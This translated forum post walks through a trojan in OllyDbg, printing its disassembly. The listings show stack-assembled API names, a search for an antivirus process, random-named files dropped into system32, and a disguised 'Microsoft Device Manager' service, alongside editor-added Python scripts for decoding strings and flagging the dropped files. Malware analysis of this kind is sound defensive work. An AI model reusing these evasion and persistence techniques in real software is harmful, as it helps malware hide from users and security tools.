This post was last edited by sunflover on 2013-1-16 13:38
【Title】: A simple analysis of a trojan
【Author】: sunflover
【Author's e-mail】: sunflover@163.com
【Software name】: Server.exe
【Software size】: 169KB
【Download】: see end of post
【Packer】: none
【Language】: Microsoft Visual C++ 6.0
【Tools used】: modified OllyDbg (od)
【Platform】: VMware XP SP3, network disconnected
【Author's note】: Just out of interest, nothing else. Corrections from the experts are welcome where I got things wrong!
--------------------------------------------------------------------------------
【Details】
360 Guard told me I hadn't run a scan for 18 days, so I scanned drives C and D, and the 360 sandbox turned up this little trojan.
I guess it was left behind from watching tutorials earlier, the kind of exe recorded with 屏幕录象专家 (Screen Recording Expert). I had heard seniors talk about this nasty trick before, but didn't expect to run into it today.
The trojan's icon is disguised as the icon shown by the system's built-in picture viewer; luckily I don't hide known file extensions. The name is plain too: Server.exe.
This is my first time analyzing a trojan, so please bear with me and point out anything badly written.
1. PEiD packer check result:
2. Load it into od and analyze.
EP: 00402812. Load it into od; at a glance the main function entry is 00401960. If you don't know how to find this, see the 幽灵逆向 disassembly tutorials.
00401960 /$ 55 push ebp
00401961 |. 8BEC mov ebp,esp
00401963 |. 81EC 14090000 sub esp,0x914
00401969 |. 53 push ebx
0040196A |. 56 push esi
0040196B |. 57 push edi
0040196C |. FF15 28474000 call dword ptr ds:[0x404728] ; Server.0040262A
00401972 |. 6A 00 push 0x0
00401974 |. 6A 00 push 0x0
00401976 |. 6A 00 push 0x0
00401978 |. FF15 3C304000 call dword ptr ds:[<&KERNEL32.GetCu>; [GetCurrentThreadId
0040197E |. 50 push eax
0040197F |. FF15 2C474000 call dword ptr ds:[0x40472C] ; Server.00402618
00401985 |. 6A 00 push 0x0
00401987 |. 6A 00 push 0x0
00401989 |. 8D45 9C lea eax,[local.25]
0040198C |. 6A 00 push 0x0
0040198E |. 50 push eax
0040198F |. FF15 44474000 call dword ptr ds:[0x404744] ; Server.004025AC
00401995 |. 8B35 0C304000 mov esi,dword ptr ds:[<&KERNEL32.Lo>; kernel32.LoadLibraryA
0040199B |. 8D4D D0 lea ecx,[local.12]
0040199E |. B3 65 mov bl,0x65 ; ASCII code of 'e' is 0x65
004019A0 |. 51 push ecx ; /ProcNameOrOrdinal
004019A1 |. 68 CC444000 push Server.004044CC ; |/kernel32.dll
004019A6 |. C645 D0 47 mov byte ptr ss:[ebp-0x30],0x47 ; ||G
004019AA |. 885D D1 mov byte ptr ss:[ebp-0x2F],bl ; ||e
004019AD |. C645 D2 74 mov byte ptr ss:[ebp-0x2E],0x74 ; ||t
004019B1 |. C645 D3 4D mov byte ptr ss:[ebp-0x2D],0x4D ; ||M; and so on below: the string is assembled one character at a time, a technique this trojan uses heavily
004019B5 |. C645 D4 6F mov byte ptr ss:[ebp-0x2C],0x6F ; ||o; presumably done to evade AV signatures
004019B9 |. C645 D5 64 mov byte ptr ss:[ebp-0x2B],0x64 ; ||d
004019BD |. C645 D6 75 mov byte ptr ss:[ebp-0x2A],0x75 ; ||u
004019C1 |. C645 D7 6C mov byte ptr ss:[ebp-0x29],0x6C ; ||l
004019C5 |. 885D D8 mov byte ptr ss:[ebp-0x28],bl ; ||e
004019C8 |. C645 D9 46 mov byte ptr ss:[ebp-0x27],0x46 ; ||F
004019CC |. C645 DA 69 mov byte ptr ss:[ebp-0x26],0x69 ; ||i
004019D0 |. C645 DB 6C mov byte ptr ss:[ebp-0x25],0x6C ; ||l
004019D4 |. 885D DC mov byte ptr ss:[ebp-0x24],bl ; ||e
004019D7 |. C645 DD 4E mov byte ptr ss:[ebp-0x23],0x4E ; ||N
004019DB |. C645 DE 61 mov byte ptr ss:[ebp-0x22],0x61 ; ||a
004019DF |. C645 DF 6D mov byte ptr ss:[ebp-0x21],0x6D ; ||m
004019E3 |. 885D E0 mov byte ptr ss:[ebp-0x20],bl ; ||e
004019E6 |. C645 E1 41 mov byte ptr ss:[ebp-0x1F],0x41 ; ||A; put together it spells GetModuleFileNameA
004019EA |. C645 E2 00 mov byte ptr ss:[ebp-0x1E],0x0 ; ||string terminator
004019EE |. FFD6 call esi ; |\LoadLibraryA
004019F0 |. 8B3D 08304000 mov edi,dword ptr ds:[<&KERNEL32.Ge>; |kernel32.GetProcAddress
004019F6 |. 50 push eax ; |hModule
004019F7 |. FFD7 call edi ; \GetProcAddress
004019F9 |. 8D55 F4 lea edx,[local.3] ; the code above resolves the address of GetModuleFileNameA
004019FC |. 8945 B8 mov [local.18],eax
004019FF |. 52 push edx
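The "one byte at a time" stack-string trick above, which the sample uses for every API name it resolves (GetModuleFileNameA here, Process32First/Process32Next and GetSystemDirectoryA later), is tedious to decode by hand. The following Python script is an example added by the editor and is not code from the original post: it parses OllyDbg listing text, tracks 8-bit register loads such as `mov bl,0x65`, collects `mov byte ptr ss:[ebp-X]` / `[esp+X]` stores, and emits each string when its NUL terminator is written. The embedded listing lines are copied from the two functions shown in this post; nothing else about the sample is assumed.

```python
import re

# Editor's example, not code from the original post. Recovers stack strings
# from OllyDbg listing text. SAMPLE_LISTING is copied from the listings in
# this post (00401960 builds GetModuleFileNameA, 00401340 builds Process32First).
SAMPLE_LISTING = """
0040199E |. B3 65          mov bl,0x65
004019A6 |. C645 D0 47     mov byte ptr ss:[ebp-0x30],0x47
004019AA |. 885D D1        mov byte ptr ss:[ebp-0x2F],bl
004019AD |. C645 D2 74     mov byte ptr ss:[ebp-0x2E],0x74
004019B1 |. C645 D3 4D     mov byte ptr ss:[ebp-0x2D],0x4D
004019B5 |. C645 D4 6F     mov byte ptr ss:[ebp-0x2C],0x6F
004019B9 |. C645 D5 64     mov byte ptr ss:[ebp-0x2B],0x64
004019BD |. C645 D6 75     mov byte ptr ss:[ebp-0x2A],0x75
004019C1 |. C645 D7 6C     mov byte ptr ss:[ebp-0x29],0x6C
004019C5 |. 885D D8        mov byte ptr ss:[ebp-0x28],bl
004019C8 |. C645 D9 46     mov byte ptr ss:[ebp-0x27],0x46
004019CC |. C645 DA 69     mov byte ptr ss:[ebp-0x26],0x69
004019D0 |. C645 DB 6C     mov byte ptr ss:[ebp-0x25],0x6C
004019D4 |. 885D DC        mov byte ptr ss:[ebp-0x24],bl
004019D7 |. C645 DD 4E     mov byte ptr ss:[ebp-0x23],0x4E
004019DB |. C645 DE 61     mov byte ptr ss:[ebp-0x22],0x61
004019DF |. C645 DF 6D     mov byte ptr ss:[ebp-0x21],0x6D
004019E3 |. 885D E0        mov byte ptr ss:[ebp-0x20],bl
004019E6 |. C645 E1 41     mov byte ptr ss:[ebp-0x1F],0x41
004019EA |. C645 E2 00     mov byte ptr ss:[ebp-0x1E],0x0       ; ||string terminator
00401351 |. B3 73          mov bl,0x73
00401359 |. C64424 28 50   mov byte ptr ss:[esp+0x28],0x50
0040135E |. C64424 29 72   mov byte ptr ss:[esp+0x29],0x72
00401363 |. C64424 2A 6F   mov byte ptr ss:[esp+0x2A],0x6F
00401368 |. C64424 2B 63   mov byte ptr ss:[esp+0x2B],0x63
0040136D |. C64424 2C 65   mov byte ptr ss:[esp+0x2C],0x65
00401372 |. 885C24 2D      mov byte ptr ss:[esp+0x2D],bl
00401376 |. 885C24 2E      mov byte ptr ss:[esp+0x2E],bl
0040137A |. C64424 2F 33   mov byte ptr ss:[esp+0x2F],0x33
0040137F |. C64424 30 32   mov byte ptr ss:[esp+0x30],0x32
00401384 |. C64424 31 46   mov byte ptr ss:[esp+0x31],0x46
00401389 |. C64424 32 69   mov byte ptr ss:[esp+0x32],0x69
0040138E |. C64424 33 72   mov byte ptr ss:[esp+0x33],0x72
00401393 |. 885C24 34      mov byte ptr ss:[esp+0x34],bl
00401397 |. C64424 35 74   mov byte ptr ss:[esp+0x35],0x74
0040139C |. C64424 36 00   mov byte ptr ss:[esp+0x36],0x0
"""

# byte store to a stack slot: immediate or an 8-bit register (bl, al, ...)
STORE_RE = re.compile(
    r"mov byte ptr ss:\[(?P<base>ebp|esp)(?P<off>[+-]0x[0-9A-Fa-f]+)\],"
    r"(?P<val>0x[0-9A-Fa-f]+|[a-d][lh])"
)
# 8-bit register load, e.g. "mov bl,0x65"
REG_RE = re.compile(r"\bmov (?P<reg>[a-d][lh]),(?P<val>0x[0-9A-Fa-f]+)")


def recover_stack_strings(lines):
    """Return the NUL-terminated strings built on the stack, in the order
    their terminators are written. Slots are keyed by (base register, offset)
    and cleared once consumed, so a frame that reuses the same slots for a
    second string is handled."""
    regs = {}    # current value of 8-bit registers
    slots = {}   # (base, offset) -> byte
    found = []
    for line in lines:
        text = line.split(";", 1)[0]          # drop OllyDbg comments
        m = REG_RE.search(text)
        if m:
            regs[m.group("reg")] = int(m.group("val"), 16) & 0xFF
            continue
        m = STORE_RE.search(text)
        if not m:
            continue
        base, off, val = m.group("base"), int(m.group("off"), 16), m.group("val")
        byte = int(val, 16) if val.startswith("0x") else regs.get(val, ord("?"))
        if byte != 0:
            slots[(base, off)] = byte & 0xFF
            continue
        # terminator written: walk back over contiguous slots to rebuild the string
        chars, pos = [], off - 1
        while (base, pos) in slots:
            chars.append(slots.pop((base, pos)))
            pos -= 1
        if chars:
            found.append(bytes(reversed(chars)).decode("latin-1"))
    return found


if __name__ == "__main__":
    for s in recover_stack_strings(SAMPLE_LISTING.splitlines()):
        print(s)
```

Paste any OllyDbg listing into the string (or feed the script a saved listing file) and it prints the API names in the order they are assembled; the same pattern with a different base register only needs the regex widened.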
After reaching the main entry, I kept stepping down with F8, and at this point I found a suspicious string: RsTray.exe
00401A26 |. C645 FE 00 mov byte ptr ss:[ebp-0x2],0x0 ; the code above is like the earlier sequence: it assembles the string RsTray.exe
00401A2A |. E8 11F9FFFF call Server.00401340 ; a suspicious process name; a quick Baidu search shows RsTray.exe is the real-time monitor of Rising Kaka Internet Security Assistant, so my guess is that it wants to kill the AV.
00401A2F |. 83C4 04 add esp,0x4
00401A32 |. 85C0 test eax,eax
00401A34 |. 74 61 je short Server.00401A97
00401A36 |. 90 nop
00401A37 |. 90 nop
Press F7 to step into the call at 00401A2A and see what it is up to.
00401340 /$ 83EC 20 sub esp,0x20
00401343 |. 53 push ebx
00401344 |. 55 push ebp
00401345 |. 56 push esi
00401346 |. 8B35 0C304000 mov esi,dword ptr ds:[<&KERNEL32.Lo>; kernel32.LoadLibraryA
0040134C |. 8D4424 1C lea eax,dword ptr ss:[esp+0x1C]
00401350 |. 57 push edi
00401351 |. B3 73 mov bl,0x73
00401353 |. 50 push eax ; /ProcNameOrOrdinal
00401354 |. 68 CC444000 push Server.004044CC ; |/kernel32.dll
00401359 |. C64424 28 50 mov byte ptr ss:[esp+0x28],0x50 ; ||
0040135E |. C64424 29 72 mov byte ptr ss:[esp+0x29],0x72 ; ||
00401363 |. C64424 2A 6F mov byte ptr ss:[esp+0x2A],0x6F ; ||
00401368 |. C64424 2B 63 mov byte ptr ss:[esp+0x2B],0x63 ; ||
0040136D |. C64424 2C 65 mov byte ptr ss:[esp+0x2C],0x65 ; ||
00401372 |. 885C24 2D mov byte ptr ss:[esp+0x2D],bl ; ||
00401376 |. 885C24 2E mov byte ptr ss:[esp+0x2E],bl ; ||
0040137A |. C64424 2F 33 mov byte ptr ss:[esp+0x2F],0x33 ; ||
0040137F |. C64424 30 32 mov byte ptr ss:[esp+0x30],0x32 ; ||
00401384 |. C64424 31 46 mov byte ptr ss:[esp+0x31],0x46 ; ||
00401389 |. C64424 32 69 mov byte ptr ss:[esp+0x32],0x69 ; ||
0040138E |. C64424 33 72 mov byte ptr ss:[esp+0x33],0x72 ; ||
00401393 |. 885C24 34 mov byte ptr ss:[esp+0x34],bl ; ||
00401397 |. C64424 35 74 mov byte ptr ss:[esp+0x35],0x74 ; ||
0040139C |. C64424 36 00 mov byte ptr ss:[esp+0x36],0x0 ; ||assembles the string Process32First, confirming the earlier guess: it walks the process list with Process32First looking for an RsTray.exe entry
004013A1 |. FFD6 call esi ; |\LoadLibraryA
004013A3 |. 8B3D 08304000 mov edi,dword ptr ds:[<&KERNEL32.Ge>; |kernel32.GetProcAddress
004013A9 |. 50 push eax ; |hModule
004013AA |. FFD7 call edi ; \GetProcAddress
004013AC |. 8D4C24 10 lea ecx,dword ptr ss:[esp+0x10] ; resolves the address of Process32First; same code as before
004013B0 |. 8BE8 mov ebp,eax
004013B2 |. 51 push ecx ; /ProcNameOrOrdinal
004013B3 |. 68 CC444000 push Server.004044CC ; |/kernel32.dll
004013B8 |. C64424 18 50 mov byte ptr ss:[esp+0x18],0x50 ; ||
004013BD |. C64424 19 72 mov byte ptr ss:[esp+0x19],0x72 ; ||
004013C2 |. C64424 1A 6F mov byte ptr ss:[esp+0x1A],0x6F ; ||
004013C7 |. C64424 1B 63 mov byte ptr ss:[esp+0x1B],0x63 ; ||
004013CC |. C64424 1C 65 mov byte ptr ss:[esp+0x1C],0x65 ; ||
004013D1 |. 885C24 1D mov byte ptr ss:[esp+0x1D],bl ; ||
004013D5 |. 885C24 1E mov byte ptr ss:[esp+0x1E],bl ; ||
004013D9 |. C64424 1F 33 mov byte ptr ss:[esp+0x1F],0x33 ; ||
004013DE |. C64424 20 32 mov byte ptr ss:[esp+0x20],0x32 ; ||
004013E3 |. C64424 21 4E mov byte ptr ss:[esp+0x21],0x4E ; ||
004013E8 |. C64424 22 65 mov byte ptr ss:[esp+0x22],0x65 ; ||
004013ED |. C64424 23 78 mov byte ptr ss:[esp+0x23],0x78 ; ||
004013F2 |. C64424 24 74 mov byte ptr ss:[esp+0x24],0x74 ; ||
004013F7 |. C64424 25 00 mov byte ptr ss:[esp+0x25],0x0 ; ||assembles Process32Next; its address is resolved next
004013FC |. FFD6 call esi ; |\LoadLibraryA
004013FE |. 50 push eax ; |hModule
004013FF |. FFD7 call edi ; \GetProcAddress
00401401 |. 6A 00 push 0x0 ; /ProcessID = 0
00401403 |. 6A 02 push 0x2 ; |Flags = TH32CS_SNAPPROCESS
00401405 |. 8BD8 mov ebx,eax ; |
00401407 |. E8 44110000 call <jmp.&KERNEL32.CreateToolhelp3>; \CreateToolhelp32Snapshot
0040140C |. 68 28010000 push 0x128 ; the process snapshot is created above; 0x128 (296) is sizeof(PROCESSENTRY32), stored into dwSize below
00401411 |. 8BF8 mov edi,eax
00401413 |. E8 EE130000 call <jmp.&MSVCRT.operator new>
00401418 |. 83C4 04 add esp,0x4
0040141B |. 8BF0 mov esi,eax
0040141D |. 56 push esi
0040141E |. 57 push edi
0040141F |. C706 28010000 mov dword ptr ds:[esi],0x128
00401425 |. FFD5 call ebp ; (kernel32.Process32First)
00401427 |. 85C0 test eax,eax
00401429 |. 74 40 je short Server.0040146B
0040142B |. 8B5424 34 mov edx,dword ptr ss:[esp+0x34] ; "RsTray.exe"
0040142F |. 8D6E 24 lea ebp,dword ptr ds:[esi+0x24] ; [System Process] ; szExeFile, offset 0x24 in PROCESSENTRY32
00401432 |. 52 push edx ; /s2
00401433 |. 55 push ebp ; |s1
00401434 |. E8 87170000 call <jmp.&MSVCRT._strcmpi> ; \_strcmpi
00401439 |. 83C4 08 add esp,0x8 ; after taking the snapshot, the code above compares the first entry's name against RsTray.exe
0040143C |. 85C0 test eax,eax
0040143E |. 75 0B jnz short Server.0040144B ; my VM only has 360 Guard, so this jump is taken
00401440 |> 8B46 08 mov eax,dword ptr ds:[esi+0x8] ; match: return th32ProcessID of the RsTray.exe process
00401443 |. 5F pop edi
00401444 |. 5E pop esi
00401445 |. 5D pop ebp
00401446 |. 5B pop ebx
00401447 |. 83C4 20 add esp,0x20
0040144A |. C3 retn
0040144B |> 56 push esi
0040144C |. 57 push edi
0040144D |. FFD3 call ebx ; (kernel32.Process32Next)
0040144F |. 85C0 test eax,eax ; continue checking the remaining entries for RsTray.exe
00401451 |. 74 18 je short Server.0040146B
00401453 |> 8B4424 34 /mov eax,dword ptr ss:[esp+0x34]
00401457 |. 50 |push eax ; /String2
00401458 |. 55 |push ebp ; |String1
00401459 |. FF15 18304000 |call dword ptr ds:[<&KERNEL32.lstr>; \lstrcmpiA
0040145F |. 85C0 |test eax,eax
00401461 |.^ 74 DD |je short Server.00401440 ; my VM only has 360 Guard, so this jump is never taken
00401463 |. 56 |push esi
00401464 |. 57 |push edi
00401465 |. FFD3 |call ebx
00401467 |. 85C0 |test eax,eax
00401469 |.^ 75 E8 \jnz short Server.00401453
0040146B |> 5F pop edi
0040146C |. 5E pop esi
0040146D |. 5D pop ebp
0040146E |. 33C0 xor eax,eax ; not found: return 0
00401470 |. 5B pop ebx
00401471 |. 83C4 20 add esp,0x20
00401474 \. C3 retn
00401475 90 nop
The code above is self-explanatory: take a snapshot of the process list and check whether an "RsTray.exe" process exists (returning its PID, or 0 if absent). Stepping through with F8, past the retn and on with F8, we come to the next suspicious spot:
00401AE1 |. C645 CD 79 mov byte ptr ss:[ebp-0x33],0x79
00401AE5 |. C645 CE 41 mov byte ptr ss:[ebp-0x32],0x41
00401AE9 |. C645 CF 00 mov byte ptr ss:[ebp-0x31],0x0 ; assembles GetSystemDirectoryA, used to get the system directory
00401AED |. FFD6 call esi ; LoadLibraryA
00401AEF |. 50 push eax
00401AF0 |. FFD7 call edi ; (kernel32.GetProcAddress) the code is the same everywhere
00401AF2 |. 8D95 F8FDFFFF lea edx,[local.130] ; (ntdll.KiFastSystemCallRet)
00401AF8 |. 68 04010000 push 0x104
00401AFD |. 52 push edx
00401AFE |. FFD0 call eax ; (kernel32.GetSystemDirectoryA)
00401B00 |. 8B35 00304000 mov esi,dword ptr ds:[<&KERNEL32.ls>; kernel32.lstrcatA
00401B06 |. 8D85 F8FDFFFF lea eax,[local.130] ; "C:\WINDOWS\system32"
00401B0C |. 68 C4454000 push Server.004045C4 ; /\
00401B11 |. 50 push eax ; |ConcatString
00401B12 |. FFD6 call esi ; \lstrcatA
00401B14 |. 8B3D 2C304000 mov edi,dword ptr ds:[<&KERNEL32.ls>; kernel32.lstrcpyA
00401B1A |. 8D8D F8FDFFFF lea ecx,[local.130]
00401B20 |. 8D95 F4FCFFFF lea edx,[local.195]
00401B26 |. 51 push ecx ; /String2
00401B27 |. 52 push edx ; |String1
00401B28 |. FFD7 call edi ; \lstrcpyA
00401B2A |. 6A 1A push 0x1A
00401B2C |. E8 4FF9FFFF call Server.00401480 ; call the random-number function
00401B31 |. 83C4 04 add esp,0x4
00401B34 |. 83C0 61 add eax,0x61
00401B37 |. 50 push eax
00401B38 |. 6A 1A push 0x1A
00401B3A |. E8 41F9FFFF call Server.00401480
00401B3F |. 83C4 04 add esp,0x4
00401B42 |. 83C0 61 add eax,0x61
00401B45 |. 50 push eax
00401B46 |. 6A 1A push 0x1A
00401B48 |. E8 33F9FFFF call Server.00401480
00401B4D |. 83C4 04 add esp,0x4
Let's look at how the call at 00401B2C, call Server.00401480 (the random-number function), is implemented. Experts can step over it; beginners press F7 to step in.
00401480 /$ 56 push esi
00401481 |. FF15 20304000 call dword ptr ds:[<&KERNEL32.GetTi>; [GetTickCount
00401487 |. 8BF0 mov esi,eax ; milliseconds elapsed since boot
00401489 |. E8 7E130000 call <jmp.&MSVCRT.rand> ; [rand
0040148E |. 83C0 03 add eax,0x3 ; generate a random number
00401491 |. 33D2 xor edx,edx
00401493 |. 0FAFC6 imul eax,esi
00401496 |. F77424 08 div dword ptr ss:[esp+0x8] ; eax = quotient, edx = remainder; the function returns edx, so the result is ((rand()+3)*GetTickCount()) mod [esp+8], with the product truncated to 32 bits by imul. A common virus trick; presumably it is about to create a file with a random name
0040149A |. 5E pop esi
0040149B |. 8BC2 mov eax,edx
0040149D \. C3 retn
0040149E 90 nop
The algorithm here is simple; if you don't know the assembly instructions you will need to brush up on them. After retn, continue with F8 to the following (I won't paste the unimportant code):
00401B6F |. 50 push eax
00401B70 |. 6A 1A push 0x1A
00401B72 |. E8 09F9FFFF call Server.00401480
00401B77 |. 8B1D 54474000 mov ebx,dword ptr ds:[0x404754] ; Server.00402556
00401B7D |. 83C4 04 add esp,0x4
00401B80 |. 83C0 61 add eax,0x61
00401B83 |. 50 push eax
00401B84 |. 8D85 FCFEFFFF lea eax,[local.65]
00401B8A |. 68 B0454000 push Server.004045B0 ; %c%c%c%c%c%c.dll
00401B8F |. 50 push eax
00401B90 |. FFD3 call ebx
00401B92 |. 83C4 20 add esp,0x20 ; sure enough, the stack window now shows the filename "mybtke.dll"
00401B95 |. 8D8D FCFEFFFF lea ecx,[local.65]
00401B9B |. 51 push ecx ; ASCII "00000000000000000000000"
00401B9C |. 68 B4414000 push Server.004041B4 ; cwrmas.dll
00401BA1 |. FFD7 call edi ; (kernel32.lstrcpyA)
00401BA3 |. 8D95 F8FDFFFF lea edx,[local.130]
00401BA9 |. 68 B4414000 push Server.004041B4 ; cwrmas.dll
00401BAE |. 52 push edx ; "C:\WINDOWS\system32\"
00401BAF |. FFD6 call esi ; (kernel32.lstrcatA)
00401BB1 |. 8D85 F8FDFFFF lea eax,[local.130] ; concatenated: system directory + 6-letter random dll name, "C:\WINDOWS\system32\mybtke.dll"
00401BB7 |. 50 push eax ; /FileName
00401BB8 |. FF15 24304000 call dword ptr ds:[<&KERNEL32.Delet>; \DeleteFileA
00401BBE |. 6A 1A push 0x1A
00401BC0 |. E8 BBF8FFFF call Server.00401480 ; call the random-number function
Looking at 00401BB8, I think the source code isn't very rigorous: since the filename is random, deleting a file with the name just generated is bound to fail.
Now that there is a filename, the next step is presumably to create the file.
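To make the naming scheme concrete, here is an example added by the editor (not code from the original post) that re-implements the routine at 00401480 as read from the listing, including the 32-bit truncation by `imul` and the remainder returned from `div`, and then shows a hunting heuristic for the artifacts the sample drops. Assumptions not stated in the post: the six return values are consumed in order by the `%c%c%c%c%c%c` format, and the fixed names `OWy1815552.inf`, `OWy1815552.bat` and `keylog.dat` are taken from later in this post; the sample paths are constructed for the example.

```python
import re

# Editor's example, not code from the original post.
MASK32 = 0xFFFFFFFF


def random_char(rand_value, tick, modulus=0x1A):
    """Mirror of sub_401480 followed by the caller's 'add eax,0x61'.
    imul eax,esi keeps only the low 32 bits of (rand()+3)*GetTickCount();
    xor edx,edx / div [esp+8] then leaves the remainder in edx, which is
    what the function returns. With modulus 0x1A (26) and +0x61 ('a') the
    caller gets one lowercase letter."""
    product = ((rand_value + 3) * tick) & MASK32
    return chr(product % modulus + 0x61)


def dropped_name(rand_values, tick, ext):
    """Six random letters plus extension, matching '%c%c%c%c%c%c.dll'.
    Assumption: the six calls use the values in order; tick is whatever
    GetTickCount returned (it barely changes between the six calls)."""
    if len(rand_values) != 6:
        raise ValueError("the sample draws exactly six characters")
    return "".join(random_char(r, tick) for r in rand_values) + ext


# Hunting heuristic: six lowercase letters + .dll/.exe in system32, or the
# hard-coded helper files. Six-letter names also occur legitimately
# (msvcrt.dll, for instance), so treat hits as leads to confirm with the
# signer, file age and the INF/service artifacts, not as verdicts.
RANDOM_NAME = re.compile(r"^[a-z]{6}\.(dll|exe)$")
FIXED_NAMES = {"owy1815552.inf", "owy1815552.bat", "keylog.dat"}


def flag_dropped_files(paths):
    hits = []
    for p in paths:
        directory, _, name = p.replace("/", "\\").rpartition("\\")
        if not directory.lower().endswith("\\system32"):
            continue
        if name.lower() in FIXED_NAMES or RANDOM_NAME.match(name):
            hits.append(p)
    return hits


# Constructed directory listing for the example (not from the sample machine).
SAMPLE_PATHS = [
    r"C:\WINDOWS\system32\mybtke.dll",
    r"C:\WINDOWS\system32\ycgigg.exe",
    r"C:\WINDOWS\system32\OWy1815552.inf",
    r"C:\WINDOWS\system32\kernel32.dll",
    r"C:\WINDOWS\system32\ntdll.dll",
    r"C:\Temp\abcdef.exe",
]

if __name__ == "__main__":
    # illustrative inputs: rand() values are 0..0x7FFF in MSVCRT
    print(dropped_name([41, 7, 0x7FFF, 100, 3, 2000], 1234567, ".dll"))
    print(flag_dropped_files(SAMPLE_PATHS))
```

The `& MASK32` matters: without it, a Python re-implementation disagrees with the binary whenever `(rand()+3)*tick` exceeds 32 bits, which is almost always the case once the machine has been up for more than a few minutes.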
00401C03 |. 50 push eax
00401C04 |. 6A 1A push 0x1A
00401C06 |. E8 75F8FFFF call Server.00401480
00401C0B |. 83C4 04 add esp,0x4
00401C0E |. 83C0 61 add eax,0x61
00401C11 |. 8D8D 4CFFFFFF lea ecx,[local.45]
00401C17 |. 50 push eax
00401C18 |. 68 A0454000 push Server.004045A0 ; %c%c%c%c%c%c
00401C1D |. 51 push ecx
00401C1E |. FFD3 call ebx
00401C20 |. 83C4 20 add esp,0x20
00401C23 |. 8D95 4CFFFFFF lea edx,[local.45]
00401C29 |. 8D85 F4FCFFFF lea eax,[local.195]
00401C2F |. 52 push edx
00401C30 |. 50 push eax
00401C31 |. FFD6 call esi
00401C33 |. 8D8D F4FCFFFF lea ecx,[local.195]
00401C39 |. 68 98454000 push Server.00404598 ; .exe
00401C3E |. 51 push ecx
00401C3F |. FFD6 call esi
00401C41 |. 8D95 F4FCFFFF lea edx,[local.195] ; concatenated "C:\WINDOWS\system32\ycgigg.exe"
00401C47 |. 52 push edx ; /FileName
00401C48 |. FF15 24304000 call dword ptr ds:[<&KERNEL32.Delet>; \DeleteFileA
00401C4E |. 8D85 F4FCFFFF lea eax,[local.195]
00401C54 |. 50 push eax
00401C55 |. 68 B4404000 push Server.004040B4 ; 监测和监视新硬件设备并自动更新设备驱动。
00401C5A |. 68 34404000 push Server.00404034 ; Microsoft Device Manager
00401C5F |. 68 14404000 push Server.00404014 ; X6Remote
00401C64 |. E8 57010000 call Server.00401DC0
00401C69 |. 68 14404000 push Server.00404014 ; X6Remote
00401C6E |. 8D8D F4FCFFFF lea ecx,[local.195]
00401C74 |. 68 B4424000 push Server.004042B4 ; AAAAAA/87xz6eIiIuLp+TL/LOPiYmJiZk=
00401C79 |. 51 push ecx
00401C7A |. 68 94454000 push Server.00404594 ; BIN
00401C7F |. 68 90454000 push Server.00404590 ; EXE
00401C84 |. 6A 00 push 0x0
00401C86 |. E8 15F8FFFF call Server.004014A0
00401C8B |. 68 14404000 push Server.00404014 ; X6Remote
00401FD7 |> /8B95 44FFFFFF /mov edx,[local.47]
00401FDD |> |8D4D A4 lea ecx,[local.23]
00401FE0 |. |6A 00 |push 0x0
00401FE2 |. |51 |push ecx
00401FE3 |. |52 |push edx ; /String
00401FE4 |. |FF15 30304000 |call dword ptr ds:[<&KERNEL32.lstr>; \lstrlenA
00401FEA |. |8B95 44FFFFFF |mov edx,[local.47]
00401FF0 |. |50 |push eax
00401FF1 |. |52 |push edx
00401FF2 |. |56 |push esi
00401FF3 |. |E8 98F1FFFF |call Server.00401190 ; write the exe file contents
00401FF8 |. |83C4 14 |add esp,0x14
00401FFB |. |4F |dec edi
00401FFC |.^\75 D9 \jnz short Server.00401FD7
00401FFE |. 56 push esi ; /hObject
00401FFF |. FF15 10304000 call dword ptr ds:[<&KERNEL32.Close>; \CloseHandle
00402005 |. B9 40000000 mov ecx,0x40 ; close the file handle after writing
This code drops the file "C:\WINDOWS\system32\ycgigg.exe". As for what algorithm AAAAAA/87xz6eIiIuLp+TL/LOPiYmJiZk= is, I'm a beginner and don't know, and I didn't see it being decrypted anywhere; anyone who understands it is welcome to enlighten me. My guess is that it is a URL used to download the trojan, because Server.exe is only 169KB while this exe is 20M, and much of the data is padded with 20h.
0040209D |. 52 push edx
0040209E |. 68 A4464000 push Server.004046A4 ; %s\OWy1815552.inf
004020A3 |. 50 push eax
004020A4 |. FFD6 call esi ; wsprintfA
004020A6 |. 83C4 0C add esp,0xC ; formats "C:\WINDOWS\system32\OWy1815552.inf"; the same below
004020A9 |. 8D8D DCFAFFFF lea ecx,[local.329]
004020AF |. 8D95 DCFBFFFF lea edx,[local.265]
004020B5 |. 51 push ecx
004020B6 |. 68 90464000 push Server.00404690 ; %s\OWy1815552.bat
004020BB |. 52 push edx
004020BC |. FFD6 call esi
004020BE |. 8B35 24304000 mov esi,dword ptr ds:[<&KERNEL32.De>; kernel32.DeleteFileA
004020C4 |. 83C4 0C add esp,0xC
004020C7 |. 8D85 E4FDFFFF lea eax,[local.135]
004020CD |. 50 push eax ; /FileName
004020CE |. FFD6 call esi ; \DeleteFileA
004020D0 |. 8D8D DCFBFFFF lea ecx,[local.265] ; the inf file is deleted first
004020D6 |. 51 push ecx ; /FileName
004020D7 |. FFD6 call esi ; \DeleteFileA
004020D9 |. A1 88464000 mov eax,dword ptr ds:[0x404688] ; then the bat file is deleted
The comments are clear enough; I won't belabor it.
00402146 |. AA stos byte ptr es:[edi] ; then the inf file is created
00402147 |. FF95 48FFFFFF call [local.46]
0040214D |. 8B3D 30304000 mov edi,dword ptr ds:[<&KERNEL32.ls>; kernel32.lstrlenA
00402153 |. 8BF0 mov esi,eax
00402155 |. 8D45 F4 lea eax,[local.3]
00402158 |. 6A 00 push 0x0
0040215A |. 8D8D E0FCFFFF lea ecx,[local.200]
00402160 |. 50 push eax
00402161 |. 51 push ecx ; /String
00402162 |. FFD7 call edi ; \lstrlenA
00402164 |. 40 inc eax
00402165 |. 8D95 E0FCFFFF lea edx,[local.200]
0040216B |. 50 push eax
0040216C |. 52 push edx
0040216D |. 56 push esi
0040216E |. E8 1DF0FFFF call Server.00401190 ; write inf file contents
00402173 |. 83C4 14 add esp,0x14
00402176 |. 6A 01 push 0x1
00402178 |. 6A 00 push 0x0
0040217A |. 6A FF push -0x1
0040217C |. 56 push esi
0040217D |. FF95 40FFFFFF call [local.48]
00402183 |. 8D45 F4 lea eax,[local.3]
00402186 |. 6A 00 push 0x0
00402188 |. 8D8D D8F9FFFF lea ecx,[local.394]
0040218E |. 50 push eax
0040218F |. 51 push ecx
00402190 |. FFD7 call edi
00402192 |. 40 inc eax
00402193 |. 8D95 D8F9FFFF lea edx,[local.394]
00402199 |. 50 push eax
0040219A |. 52 push edx
0040219B |. 56 push esi
0040219C |. E8 EFEFFFFF call Server.00401190
